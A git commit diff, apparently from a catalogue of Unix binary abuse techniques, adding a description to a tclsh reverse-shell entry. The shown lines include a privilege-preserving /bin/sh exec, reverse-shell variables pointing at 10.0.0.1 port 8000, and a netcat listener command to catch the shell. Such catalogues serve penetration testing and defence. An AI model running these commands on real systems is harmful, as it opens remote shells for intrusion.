Add tclsh reverse shell description

This commit is contained in:
Emilio Pinna 2018-05-22 22:07:10 +01:00
parent 24a7c20324
commit 5f5598b1c3

View File

@ -13,7 +13,7 @@ functions:
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
reverse-shell:
- description:
- description: Run `nc -l -p 8000` to receive the shell on the other end.
code: |
export RHOST=10.0.0.1
export RPORT=8000